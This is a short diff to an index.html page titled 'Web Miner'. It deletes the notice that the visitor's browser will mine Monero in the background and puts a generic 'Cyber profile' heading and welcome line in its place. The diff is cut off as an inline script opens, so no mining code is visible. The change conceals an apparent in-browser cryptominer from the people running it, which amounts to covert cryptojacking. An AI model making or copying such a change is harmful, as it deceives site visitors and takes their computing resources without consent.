--- a/index.html
+++ b/index.html
@@ -4,8 +4,8 @@
     <title>Web Miner</title>
 </head>
 <body>
-    <h1>Welcome to the Mining Website</h1>
-    <p>Your browser will mine Monero in the background to support this site.</p>
+    <h1>Cyber profile</h1>
+    <p>Thank you to come here...</p>
 
     <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/1.4.0/axios.min.js"></script>
     <script>
